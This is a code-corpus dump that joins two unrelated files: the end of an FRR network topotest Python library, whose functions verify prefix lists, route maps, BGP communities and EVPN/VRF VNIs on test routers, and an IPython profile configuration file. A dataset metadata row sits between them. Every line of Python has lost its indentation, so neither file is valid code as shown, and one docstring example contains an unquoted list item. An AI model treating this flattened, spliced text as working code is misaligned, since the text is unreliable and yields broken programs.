logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def verify_prefix_lists(tgen, input_dict):
"""
Running "show ip prefix-list" command and verifying given prefix-list
is present in router.
Parameters
----------
* `tgen` : topogen object
* `input_dict`: data to verify prefix lists
Usage
-----
# To verify pf_list_1 has been removed from router r1
input_dict = {
"r1": {
"prefix_lists": {
"ipv4": {
"pf_list_1": []
}
}
}
}
result = verify_prefix_lists(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
# Show ip prefix list
show_prefix_list = run_frr_cmd(rnode, "show ip prefix-list")
# Verify Prefix list is deleted
prefix_lists_addr = input_dict[router]["prefix_lists"]
for addr_type in prefix_lists_addr:
if not check_address_types(addr_type):
continue
for prefix_list in prefix_lists_addr[addr_type].keys():
if prefix_list in show_prefix_list:
errormsg = (
"Prefix list {} is still present in router"
" {}".format(prefix_list, router)
)
return errormsg
logger.info(
"Prefix list %s is not present in router %s",
prefix_list,
router,
)
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
@retry(attempts=2, wait=4, return_is_str=True, initial_wait=2)
def verify_route_maps(tgen, input_dict):
"""
Running "show route-map" command and verifying given route-map
is present in router.
Parameters
----------
* `tgen` : topogen object
* `input_dict`: data to verify prefix lists
Usage
-----
# To verify rmap_1 and rmap_2 have been deleted from router r1
input_dict = {
"r1": {
"route_maps": ["rmap_1", "rmap_2"]
}
}
result = verify_route_maps(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
# Show ip route-map
show_route_maps = rnode.vtysh_cmd("show route-map")
# Verify route-map is deleted
route_maps = input_dict[router]["route_maps"]
for route_map in route_maps:
if route_map in show_route_maps:
errormsg = "Route map {} is not deleted from router" " {}".format(
route_map, router
)
return errormsg
logger.info(
"Route maps %s are deleted successfully from router %s",
route_maps,
router,
)
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
@retry(attempts=3, wait=4, return_is_str=True)
def verify_bgp_community(tgen, addr_type, router, network, input_dict=None):
"""
API to verify that a BGP (large) community attribute is attached to a route
for any given DUT by running "show bgp ipv4/6 {route address} json" command.
Parameters
----------
* `tgen`: topogen object
* `addr_type` : ip type, ipv4/ipv6
* `router`: Device Under Test (DUT)
* `network`: network for which set criteria needs to be verified
* `input_dict`: having details like - for which router, community and
values needs to be verified
Usage
-----
networks = ["200.50.2.0/32"]
input_dict = {
"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"
}
result = verify_bgp_community(tgen, "ipv4", dut, network, input_dict=None)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
if router not in tgen.routers():
return False
rnode = tgen.routers()[router]
logger.debug(
"Verifying BGP community attributes on dut %s: for %s " "network %s",
router,
addr_type,
network,
)
for net in network:
cmd = "show bgp {} {} json".format(addr_type, net)
show_bgp_json = rnode.vtysh_cmd(cmd, isjson=True)
logger.info(show_bgp_json)
if "paths" not in show_bgp_json:
return "Prefix {} not found in BGP table of router: {}".format(net, router)
as_paths = show_bgp_json["paths"]
found = False
for i in range(len(as_paths)):
if (
"largeCommunity" in show_bgp_json["paths"][i]
or "community" in show_bgp_json["paths"][i]
):
found = True
logger.info(
"Large Community attribute is found for route:" " %s in router: %s",
net,
router,
)
if input_dict is not None:
for criteria, comm_val in input_dict.items():
show_val = show_bgp_json["paths"][i][criteria]["string"]
if comm_val == show_val:
logger.info(
"Verifying BGP %s for prefix: %s"
" in router: %s, found expected"
" value: %s",
criteria,
net,
router,
comm_val,
)
else:
errormsg = (
"Failed: Verifying BGP attribute"
" {} for route: {} in router: {}"
", expected value: {} but found"
": {}".format(criteria, net, router, comm_val, show_val)
)
return errormsg
if not found:
errormsg = (
"Large Community attribute is not found for route: "
"{} in router: {} ".format(net, router)
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def verify_create_community_list(tgen, input_dict):
"""
API to verify that a BGP large community-list is created for any given DUT in
input_dict, by running "show bgp large-community-list {comm_name} detail"
command.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: having details like - for which router, large community
needs to be verified
Usage
-----
input_dict = {
"r1": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "Test1",
"value": "2:1:1"
}
]
}
}
result = verify_create_community_list(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
logger.info("Verifying large-community is created for dut %s:", router)
for comm_data in input_dict[router]["bgp_community_lists"]:
comm_name = comm_data["name"]
comm_type = comm_data["community_type"]
show_bgp_community = run_frr_cmd(
rnode, "show bgp large-community-list {} detail".format(comm_name)
)
# Verify community list and type
if comm_name in show_bgp_community and comm_type in show_bgp_community:
logger.info(
"BGP %s large-community-list %s is" " created", comm_type, comm_name
)
else:
errormsg = "BGP {} large-community-list {} is not" " created".format(
comm_type, comm_name
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def verify_cli_json(tgen, input_dict):
"""
API to verify that JSON output is available for the given CLI
commands.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: CLIs for which JSON needs to be verified
Usage
-----
input_dict = {
"edge1":{
"cli": ["show evpn vni detail", show evpn rmac vni all]
}
}
result = verify_cli_json(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
for cli in input_dict[dut]["cli"]:
logger.info(
"[DUT: %s]: Verifying JSON is available for " "CLI %s :", dut, cli
)
test_cli = "{} json".format(cli)
ret_json = rnode.vtysh_cmd(test_cli, isjson=True)
if not bool(ret_json):
errormsg = "CLI: %s, JSON format is not available" % (cli)
return errormsg
elif "unknown" in ret_json or "Unknown" in ret_json:
errormsg = "CLI: %s, JSON format is not available" % (cli)
return errormsg
else:
logger.info(
"CLI : %s JSON format is available: " "\n %s", cli, ret_json
)
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
@retry(attempts=2, wait=4, return_is_str=True, initial_wait=2)
def verify_evpn_vni(tgen, input_dict):
"""
API to verify evpn vni details using "show evpn vni detail json"
command.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: having details like - for which router, evpn details
needs to be verified
Usage
-----
input_dict = {
"edge1":{
"vni": [
{
"name": "75100",
"vrf": "RED",
"vxlanIntf": "vxlan75100",
"localVtepIp": "120.1.1.1",
"sviIntf": "br100"
}
]
}
}
result = verify_evpn_vni(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying evpn vni details :", dut)
cmd = "show evpn vni detail json"
evpn_all_vni_json = run_frr_cmd(rnode, cmd, isjson=True)
if not bool(evpn_all_vni_json):
errormsg = "No output for '{}' cli".format(cmd)
return errormsg
if "vni" in input_dict[dut]:
for vni_dict in input_dict[dut]["vni"]:
found = False
vni = vni_dict["name"]
for evpn_vni_json in evpn_all_vni_json:
if "vni" in evpn_vni_json:
if evpn_vni_json["vni"] != int(vni):
continue
for attribute in vni_dict.keys():
if vni_dict[attribute] != evpn_vni_json[attribute]:
errormsg = (
"[DUT: %s] Verifying "
"%s for VNI: %s [FAILED]||"
", EXPECTED : %s "
" FOUND : %s"
% (
dut,
attribute,
vni,
vni_dict[attribute],
evpn_vni_json[attribute],
)
)
return errormsg
else:
found = True
logger.info(
"[DUT: %s] Verifying"
" %s for VNI: %s , "
"Found Expected : %s ",
dut,
attribute,
vni,
evpn_vni_json[attribute],
)
if evpn_vni_json["state"] != "Up":
errormsg = (
"[DUT: %s] Failed: Verifying"
" State for VNI: %s is not Up" % (dut, vni)
)
return errormsg
else:
errormsg = (
"[DUT: %s] Failed:"
" VNI: %s is not present in JSON" % (dut, vni)
)
return errormsg
if found:
logger.info(
"[DUT %s]: Verifying VNI : %s "
"details and state is Up [PASSED]!!",
dut,
vni,
)
return True
else:
errormsg = (
"[DUT: %s] Failed:" " vni details are not present in input data" % (dut)
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return False
@retry(attempts=2, wait=4, return_is_str=True, initial_wait=2)
def verify_vrf_vni(tgen, input_dict):
"""
API to verify vrf vni details using "show vrf vni json"
command.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: having details like - for which router, evpn details
needs to be verified
Usage
-----
input_dict = {
"edge1":{
"vrfs": [
{
"RED":{
"vni": 75000,
"vxlanIntf": "vxlan75100",
"sviIntf": "br100",
"routerMac": "00:80:48:ba:d1:00",
"state": "Up"
}
}
]
}
}
result = verify_vrf_vni(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying vrf vni details :", dut)
cmd = "show vrf vni json"
vrf_all_vni_json = run_frr_cmd(rnode, cmd, isjson=True)
if not bool(vrf_all_vni_json):
errormsg = "No output for '{}' cli".format(cmd)
return errormsg
if "vrfs" in input_dict[dut]:
for vrfs in input_dict[dut]["vrfs"]:
for vrf, vrf_dict in vrfs.items():
found = False
for vrf_vni_json in vrf_all_vni_json["vrfs"]:
if "vrf" in vrf_vni_json:
if vrf_vni_json["vrf"] != vrf:
continue
for attribute in vrf_dict.keys():
if vrf_dict[attribute] == vrf_vni_json[attribute]:
found = True
logger.info(
"[DUT %s]: VRF: %s, "
"verifying %s "
", Found Expected: %s "
"[PASSED]!!",
dut,
vrf,
attribute,
vrf_vni_json[attribute],
)
else:
errormsg = (
"[DUT: %s] VRF: %s, "
"verifying %s [FAILED!!] "
", EXPECTED : %s "
", FOUND : %s"
% (
dut,
vrf,
attribute,
vrf_dict[attribute],
vrf_vni_json[attribute],
)
)
return errormsg
else:
errormsg = "[DUT: %s] VRF: %s " "is not present in JSON" % (
dut,
vrf,
)
return errormsg
if found:
logger.info(
"[DUT %s] Verifying VRF: %s " " details [PASSED]!!",
dut,
vrf,
)
return True
else:
errormsg = (
"[DUT: %s] Failed:" " vrf details are not present in input data" % (dut)
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return False
| gpl-2.0 | -3,059,218,530,192,539,600 | 33.986071 | 96 | 0.456985 | false |
npotts/dotfiles | ipython/profile_default/ipython_config.py | 1 | 38662 | c = get_config()
# NEVER NAG ME
c.TerminalInteractiveShell.confirm_exit = False
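# A few related quality-of-life tweaks one might add here (illustrative and
# commented out; these trait names appear in the generated reference below):
# c.TerminalInteractiveShell.editing_mode = 'vi'
# c.TerminalInteractiveShell.true_color = True
# c.TerminalInteractiveShell.editor = 'vim'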
# Configuration file for ipython.
# ------------------------------------------------------------------------------
# InteractiveShellApp(Configurable) configuration
# ------------------------------------------------------------------------------
## A Mixin for applications that start InteractiveShell instances.
#
# Provides configurables for loading extensions and executing files as part of
# configuring a Shell environment.
#
# The following methods should be called by the :meth:`initialize` method of the
# subclass:
#
# - :meth:`init_path`
# - :meth:`init_shell` (to be implemented by the subclass)
# - :meth:`init_gui_pylab`
# - :meth:`init_extensions`
# - :meth:`init_code`
## Execute the given command string.
# Default: ''
# c.InteractiveShellApp.code_to_run = ''
## Run the file referenced by the PYTHONSTARTUP environment variable at IPython
# startup.
# Default: True
# c.InteractiveShellApp.exec_PYTHONSTARTUP = True
## List of files to run at IPython startup.
# Default: []
# c.InteractiveShellApp.exec_files = []
## lines of code to run at IPython startup.
# Default: []
# c.InteractiveShellApp.exec_lines = []
## A list of dotted module names of IPython extensions to load.
# Default: []
# c.InteractiveShellApp.extensions = []
## dotted module name of an IPython extension to load.
# Default: ''
# c.InteractiveShellApp.extra_extension = ''
## A file to be run
# Default: ''
# c.InteractiveShellApp.file_to_run = ''
## Enable GUI event loop integration with any of ('asyncio', 'glut', 'gtk',
# 'gtk2', 'gtk3', 'osx', 'pyglet', 'qt', 'qt4', 'qt5', 'tk', 'wx', 'gtk2',
# 'qt4').
# Choices: any of ['asyncio', 'glut', 'gtk', 'gtk2', 'gtk3', 'osx', 'pyglet', 'qt', 'qt4', 'qt5', 'tk', 'wx', 'gtk2', 'qt4'] (case-insensitive) or None
# Default: None
# c.InteractiveShellApp.gui = None
## Should variables loaded at startup (by startup files, exec_lines, etc.) be
# hidden from tools like %who?
# Default: True
# c.InteractiveShellApp.hide_initial_ns = True
## If True, IPython will not add the current working directory to sys.path. When
# False, the current working directory is added to sys.path, allowing imports of
# modules defined in the current directory.
# Default: False
# c.InteractiveShellApp.ignore_cwd = False
## Configure matplotlib for interactive use with the default matplotlib backend.
# Choices: any of ['auto', 'agg', 'gtk', 'gtk3', 'inline', 'ipympl', 'nbagg', 'notebook', 'osx', 'pdf', 'ps', 'qt', 'qt4', 'qt5', 'svg', 'tk', 'widget', 'wx'] (case-insensitive) or None
# Default: None
# c.InteractiveShellApp.matplotlib = None
## Run the module as a script.
# Default: ''
# c.InteractiveShellApp.module_to_run = ''
## Pre-load matplotlib and numpy for interactive use, selecting a particular
# matplotlib backend and loop integration.
# Choices: any of ['auto', 'agg', 'gtk', 'gtk3', 'inline', 'ipympl', 'nbagg', 'notebook', 'osx', 'pdf', 'ps', 'qt', 'qt4', 'qt5', 'svg', 'tk', 'widget', 'wx'] (case-insensitive) or None
# Default: None
# c.InteractiveShellApp.pylab = None
## If true, IPython will populate the user namespace with numpy, pylab, etc. and
# an ``import *`` is done from numpy and pylab, when using pylab mode.
#
# When False, pylab mode should not import any names into the user namespace.
# Default: True
# c.InteractiveShellApp.pylab_import_all = True
## Reraise exceptions encountered loading IPython extensions?
# Default: False
# c.InteractiveShellApp.reraise_ipython_extension_failures = False
# ------------------------------------------------------------------------------
# Application(SingletonConfigurable) configuration
# ------------------------------------------------------------------------------
## This is an application.
## The date format used by logging formatters for %(asctime)s
# Default: '%Y-%m-%d %H:%M:%S'
# c.Application.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
# Default: '[%(name)s]%(highlevel)s %(message)s'
# c.Application.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
# Choices: any of [0, 10, 20, 30, 40, 50, 'DEBUG', 'INFO', 'WARN', 'ERROR', 'CRITICAL']
# Default: 30
# c.Application.log_level = 30
## Instead of starting the Application, dump configuration to stdout
# Default: False
# c.Application.show_config = False
## Instead of starting the Application, dump configuration to stdout (as JSON)
# Default: False
# c.Application.show_config_json = False
# ------------------------------------------------------------------------------
# BaseIPythonApplication(Application) configuration
# ------------------------------------------------------------------------------
## IPython: an enhanced interactive Python shell.
## Whether to create profile dir if it doesn't exist
# Default: False
# c.BaseIPythonApplication.auto_create = False
## Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# Default: False
# c.BaseIPythonApplication.copy_config_files = False
## Path to an extra config file to load.
#
# If specified, load this config file in addition to any other IPython config.
# Default: ''
# c.BaseIPythonApplication.extra_config_file = ''
## The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This option can also be specified through the environment
# variable IPYTHONDIR.
# Default: ''
# c.BaseIPythonApplication.ipython_dir = ''
## The date format used by logging formatters for %(asctime)s
# See also: Application.log_datefmt
# c.BaseIPythonApplication.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
# See also: Application.log_format
# c.BaseIPythonApplication.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
# See also: Application.log_level
# c.BaseIPythonApplication.log_level = 30
## Whether to overwrite existing config files when copying
# Default: False
# c.BaseIPythonApplication.overwrite = False
## The IPython profile to use.
# Default: 'default'
# c.BaseIPythonApplication.profile = 'default'
## Instead of starting the Application, dump configuration to stdout
# See also: Application.show_config
# c.BaseIPythonApplication.show_config = False
## Instead of starting the Application, dump configuration to stdout (as JSON)
# See also: Application.show_config_json
# c.BaseIPythonApplication.show_config_json = False
## Create a massive crash report when IPython encounters what may be an internal
# error. The default is to append a short message to the usual traceback
# Default: False
# c.BaseIPythonApplication.verbose_crash = False
# ------------------------------------------------------------------------------
# TerminalIPythonApp(BaseIPythonApplication, InteractiveShellApp) configuration
# ------------------------------------------------------------------------------
## Execute the given command string.
# See also: InteractiveShellApp.code_to_run
# c.TerminalIPythonApp.code_to_run = ''
## Whether to install the default config files into the profile dir.
# See also: BaseIPythonApplication.copy_config_files
# c.TerminalIPythonApp.copy_config_files = False
## Whether to display a banner upon starting IPython.
# Default: True
# c.TerminalIPythonApp.display_banner = True
## Run the file referenced by the PYTHONSTARTUP environment
# See also: InteractiveShellApp.exec_PYTHONSTARTUP
# c.TerminalIPythonApp.exec_PYTHONSTARTUP = True
## List of files to run at IPython startup.
# See also: InteractiveShellApp.exec_files
# c.TerminalIPythonApp.exec_files = []
## lines of code to run at IPython startup.
# See also: InteractiveShellApp.exec_lines
# c.TerminalIPythonApp.exec_lines = []
## A list of dotted module names of IPython extensions to load.
# See also: InteractiveShellApp.extensions
# c.TerminalIPythonApp.extensions = []
## Path to an extra config file to load.
# See also: BaseIPythonApplication.extra_config_file
# c.TerminalIPythonApp.extra_config_file = ''
## dotted module name of an IPython extension to load.
# See also: InteractiveShellApp.extra_extension
# c.TerminalIPythonApp.extra_extension = ''
## A file to be run
# See also: InteractiveShellApp.file_to_run
# c.TerminalIPythonApp.file_to_run = ''
## If a command or file is given via the command-line, e.g. 'ipython foo.py',
# start an interactive shell after executing the file or command.
# Default: False
# c.TerminalIPythonApp.force_interact = False
## Enable GUI event loop integration with any of ('asyncio', 'glut', 'gtk',
# 'gtk2', 'gtk3', 'osx', 'pyglet', 'qt', 'qt4', 'qt5', 'tk', 'wx', 'gtk2',
# 'qt4').
# See also: InteractiveShellApp.gui
# c.TerminalIPythonApp.gui = None
## Should variables loaded at startup (by startup files, exec_lines, etc.)
# See also: InteractiveShellApp.hide_initial_ns
# c.TerminalIPythonApp.hide_initial_ns = True
## If True, IPython will not add the current working directory to sys.path.
# See also: InteractiveShellApp.ignore_cwd
# c.TerminalIPythonApp.ignore_cwd = False
## Class to use to instantiate the TerminalInteractiveShell object. Useful for
# custom Frontends
# Default: 'IPython.terminal.interactiveshell.TerminalInteractiveShell'
# c.TerminalIPythonApp.interactive_shell_class = 'IPython.terminal.interactiveshell.TerminalInteractiveShell'
##
# See also: BaseIPythonApplication.ipython_dir
# c.TerminalIPythonApp.ipython_dir = ''
## The date format used by logging formatters for %(asctime)s
# See also: Application.log_datefmt
# c.TerminalIPythonApp.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
# See also: Application.log_format
# c.TerminalIPythonApp.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
# See also: Application.log_level
# c.TerminalIPythonApp.log_level = 30
## Configure matplotlib for interactive use with
# See also: InteractiveShellApp.matplotlib
# c.TerminalIPythonApp.matplotlib = None
## Run the module as a script.
# See also: InteractiveShellApp.module_to_run
# c.TerminalIPythonApp.module_to_run = ''
## Whether to overwrite existing config files when copying
# See also: BaseIPythonApplication.overwrite
# c.TerminalIPythonApp.overwrite = False
## The IPython profile to use.
# See also: BaseIPythonApplication.profile
# c.TerminalIPythonApp.profile = 'default'
## Pre-load matplotlib and numpy for interactive use,
# See also: InteractiveShellApp.pylab
# c.TerminalIPythonApp.pylab = None
## If true, IPython will populate the user namespace with numpy, pylab, etc.
# See also: InteractiveShellApp.pylab_import_all
# c.TerminalIPythonApp.pylab_import_all = True
## Start IPython quickly by skipping the loading of config files.
# Default: False
# c.TerminalIPythonApp.quick = False
## Reraise exceptions encountered loading IPython extensions?
# See also: InteractiveShellApp.reraise_ipython_extension_failures
# c.TerminalIPythonApp.reraise_ipython_extension_failures = False
## Instead of starting the Application, dump configuration to stdout
# See also: Application.show_config
# c.TerminalIPythonApp.show_config = False
## Instead of starting the Application, dump configuration to stdout (as JSON)
# See also: Application.show_config_json
# c.TerminalIPythonApp.show_config_json = False
## Create a massive crash report when IPython encounters what may be an
# See also: BaseIPythonApplication.verbose_crash
# c.TerminalIPythonApp.verbose_crash = False
# ------------------------------------------------------------------------------
# InteractiveShell(SingletonConfigurable) configuration
# ------------------------------------------------------------------------------
## An enhanced, interactive shell for Python.
## 'all', 'last', 'last_expr' or 'none', 'last_expr_or_assign' specifying which
# nodes should be run interactively (displaying output from expressions).
# Choices: any of ['all', 'last', 'last_expr', 'none', 'last_expr_or_assign']
# Default: 'last_expr'
# c.InteractiveShell.ast_node_interactivity = 'last_expr'
## A list of ast.NodeTransformer subclass instances, which will be applied to
# user input before code is run.
# Default: []
# c.InteractiveShell.ast_transformers = []
## Automatically run await statement in the top level repl.
# Default: True
# c.InteractiveShell.autoawait = True
## Make IPython automatically call any callable object even if you didn't type
# explicit parentheses. For example, 'str 43' becomes 'str(43)' automatically.
# The value can be '0' to disable the feature, '1' for 'smart' autocall, where
# it is not applied if there are no more arguments on the line, and '2' for
# 'full' autocall, where all callable objects are automatically called (even if
# no arguments are present).
# Choices: any of [0, 1, 2]
# Default: 0
# c.InteractiveShell.autocall = 0
## Autoindent IPython code entered interactively.
# Default: True
# c.InteractiveShell.autoindent = True
## Enable magic commands to be called without the leading %.
# Default: True
# c.InteractiveShell.automagic = True
## The part of the banner to be printed before the profile
# Default: "Python 3.8.6 (default, Sep 25 2020, 09:36:53) \nType 'copyright', 'credits' or 'license' for more information\nIPython 7.18.1 -- An enhanced Interactive Python. Type '?' for help.\n"
# c.InteractiveShell.banner1 = "Python 3.8.6 (default, Sep 25 2020, 09:36:53) \nType 'copyright', 'credits' or 'license' for more information\nIPython 7.18.1 -- An enhanced Interactive Python. Type '?' for help.\n"
## The part of the banner to be printed after the profile
# Default: ''
# c.InteractiveShell.banner2 = ''
## Set the size of the output cache. The default is 1000, you can change it
# permanently in your config file. Setting it to 0 completely disables the
# caching system, and the minimum value accepted is 3 (if you provide a value
# less than 3, it is reset to 0 and a warning is issued). This limit is defined
# because otherwise you'll spend more time re-flushing a too small cache than
# working
# Default: 1000
# c.InteractiveShell.cache_size = 1000
## Use colors for displaying information about objects. Because this information
# is passed through a pager (like 'less'), and some pagers get confused with
# color codes, this capability can be turned off.
# Default: True
# c.InteractiveShell.color_info = True
## Set the color scheme (NoColor, Neutral, Linux, or LightBG).
# Choices: any of ['Neutral', 'NoColor', 'LightBG', 'Linux'] (case-insensitive)
# Default: 'Neutral'
# c.InteractiveShell.colors = 'Neutral'
# Default: False
# c.InteractiveShell.debug = False
## Don't call post-execute functions that have failed in the past.
# Default: False
# c.InteractiveShell.disable_failing_post_execute = False
## If True, anything that would be passed to the pager will be displayed as
# regular output instead.
# Default: False
# c.InteractiveShell.display_page = False
## (Provisional API) enables html representation in mime bundles sent to pagers.
# Default: False
# c.InteractiveShell.enable_html_pager = False
## Total length of command history
# Default: 10000
# c.InteractiveShell.history_length = 10000
## The number of saved history entries to be loaded into the history buffer at
# startup.
# Default: 1000
# c.InteractiveShell.history_load_length = 1000
# Default: ''
# c.InteractiveShell.ipython_dir = ''
## Start logging to the given file in append mode. Use `logfile` to specify a log
# file to **overwrite** logs to.
# Default: ''
# c.InteractiveShell.logappend = ''
## The name of the logfile to use.
# Default: ''
# c.InteractiveShell.logfile = ''
## Start logging to the default log file in overwrite mode. Use `logappend` to
# specify a log file to **append** logs to.
# Default: False
# c.InteractiveShell.logstart = False
## Select the loop runner that will be used to execute top-level asynchronous
# code
# Default: 'IPython.core.interactiveshell._asyncio_runner'
# c.InteractiveShell.loop_runner = 'IPython.core.interactiveshell._asyncio_runner'
# Choices: any of [0, 1, 2]
# Default: 0
# c.InteractiveShell.object_info_string_level = 0
## Automatically call the pdb debugger after every exception.
# Default: False
# c.InteractiveShell.pdb = False
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: 'In [\\#]: '
# c.InteractiveShell.prompt_in1 = 'In [\\#]: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: ' .\\D.: '
# c.InteractiveShell.prompt_in2 = ' .\\D.: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: 'Out[\\#]: '
# c.InteractiveShell.prompt_out = 'Out[\\#]: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: True
# c.InteractiveShell.prompts_pad_left = True
# Default: False
# c.InteractiveShell.quiet = False
# Default: '\n'
# c.InteractiveShell.separate_in = '\n'
# Default: ''
# c.InteractiveShell.separate_out = ''
# Default: ''
# c.InteractiveShell.separate_out2 = ''
## Show rewritten input, e.g. for autocall.
# Default: True
# c.InteractiveShell.show_rewritten_input = True
## Enables rich html representation of docstrings. (This requires the docrepr
# module).
# Default: False
# c.InteractiveShell.sphinxify_docstring = False
# Default: True
# c.InteractiveShell.wildcards_case_sensitive = True
## Switch modes for the IPython exception handlers.
# Choices: any of ['Context', 'Plain', 'Verbose', 'Minimal'] (case-insensitive)
# Default: 'Context'
# c.InteractiveShell.xmode = 'Context'
# ------------------------------------------------------------------------------
# TerminalInteractiveShell(InteractiveShell) configuration
# ------------------------------------------------------------------------------
##
# See also: InteractiveShell.ast_node_interactivity
# c.TerminalInteractiveShell.ast_node_interactivity = 'last_expr'
##
# See also: InteractiveShell.ast_transformers
# c.TerminalInteractiveShell.ast_transformers = []
##
# See also: InteractiveShell.autoawait
# c.TerminalInteractiveShell.autoawait = True
##
# See also: InteractiveShell.autocall
# c.TerminalInteractiveShell.autocall = 0
## Autoformatter to reformat Terminal code. Can be `'black'` or `None`
# Default: None
# c.TerminalInteractiveShell.autoformatter = None
##
# See also: InteractiveShell.autoindent
# c.TerminalInteractiveShell.autoindent = True
##
# See also: InteractiveShell.automagic
# c.TerminalInteractiveShell.automagic = True
## The part of the banner to be printed before the profile
# See also: InteractiveShell.banner1
# c.TerminalInteractiveShell.banner1 = "Python 3.8.6 (default, Sep 25 2020, 09:36:53) \nType 'copyright', 'credits' or 'license' for more information\nIPython 7.18.1 -- An enhanced Interactive Python. Type '?' for help.\n"
## The part of the banner to be printed after the profile
# See also: InteractiveShell.banner2
# c.TerminalInteractiveShell.banner2 = ''
##
# See also: InteractiveShell.cache_size
# c.TerminalInteractiveShell.cache_size = 1000
##
# See also: InteractiveShell.color_info
# c.TerminalInteractiveShell.color_info = True
## Set the color scheme (NoColor, Neutral, Linux, or LightBG).
# See also: InteractiveShell.colors
# c.TerminalInteractiveShell.colors = 'Neutral'
## Set to confirm when you try to exit IPython with an EOF (Control-D in Unix,
# Control-Z/Enter in Windows). By typing 'exit' or 'quit', you can force a
# direct exit without any confirmation.
# Default: True
# c.TerminalInteractiveShell.confirm_exit = True
# See also: InteractiveShell.debug
# c.TerminalInteractiveShell.debug = False
## Don't call post-execute functions that have failed in the past.
# See also: InteractiveShell.disable_failing_post_execute
# c.TerminalInteractiveShell.disable_failing_post_execute = False
## Options for displaying tab completions, 'column', 'multicolumn', and
# 'readlinelike'. These options are for `prompt_toolkit`, see `prompt_toolkit`
# documentation for more information.
# Choices: any of ['column', 'multicolumn', 'readlinelike']
# Default: 'multicolumn'
# c.TerminalInteractiveShell.display_completions = 'multicolumn'
## If True, anything that would be passed to the pager
# See also: InteractiveShell.display_page
# c.TerminalInteractiveShell.display_page = False
## Shortcut style to use at the prompt. 'vi' or 'emacs'.
# Default: 'emacs'
# c.TerminalInteractiveShell.editing_mode = 'emacs'
## Set the editor used by IPython (default to $EDITOR/vi/notepad).
# Default: 'vim'
# c.TerminalInteractiveShell.editor = 'vim'
## Allows to enable/disable the prompt toolkit history search
# Default: True
# c.TerminalInteractiveShell.enable_history_search = True
##
# See also: InteractiveShell.enable_html_pager
# c.TerminalInteractiveShell.enable_html_pager = False
## Enable vi (v) or Emacs (C-X C-E) shortcuts to open an external editor. This is
# in addition to the F2 binding, which is always enabled.
# Default: False
# c.TerminalInteractiveShell.extra_open_editor_shortcuts = False
## Provide an alternative handler to be called when the user presses Return. This
# is an advanced option intended for debugging, which may be changed or removed
# in later releases.
# Default: None
# c.TerminalInteractiveShell.handle_return = None
## Highlight matching brackets.
# Default: True
# c.TerminalInteractiveShell.highlight_matching_brackets = True
## The name or class of a Pygments style to use for syntax highlighting. To see
# available styles, run `pygmentize -L styles`.
# Default: traitlets.Undefined
# c.TerminalInteractiveShell.highlighting_style = traitlets.Undefined
## Override highlighting format for specific tokens
# Default: {}
# c.TerminalInteractiveShell.highlighting_style_overrides = {}
## Total length of command history
# See also: InteractiveShell.history_length
# c.TerminalInteractiveShell.history_length = 10000
##
# See also: InteractiveShell.history_load_length
# c.TerminalInteractiveShell.history_load_length = 1000
# See also: InteractiveShell.ipython_dir
# c.TerminalInteractiveShell.ipython_dir = ''
##
# See also: InteractiveShell.logappend
# c.TerminalInteractiveShell.logappend = ''
##
# See also: InteractiveShell.logfile
# c.TerminalInteractiveShell.logfile = ''
##
# See also: InteractiveShell.logstart
# c.TerminalInteractiveShell.logstart = False
## Select the loop runner that will be used to execute top-level asynchronous
# code
# See also: InteractiveShell.loop_runner
